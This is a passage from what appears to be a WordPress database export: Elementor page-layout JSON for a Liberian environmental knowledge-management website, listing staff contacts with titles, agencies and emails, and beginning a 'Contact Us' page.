href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24706,3657,'_elementor_edit_mode','builder'),(24707,3657,'_elementor_template_type','wp-page'),(24708,3657,'_elementor_version','3.0.16'),(24709,3657,'_wp_page_template','default'),(24710,3657,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your 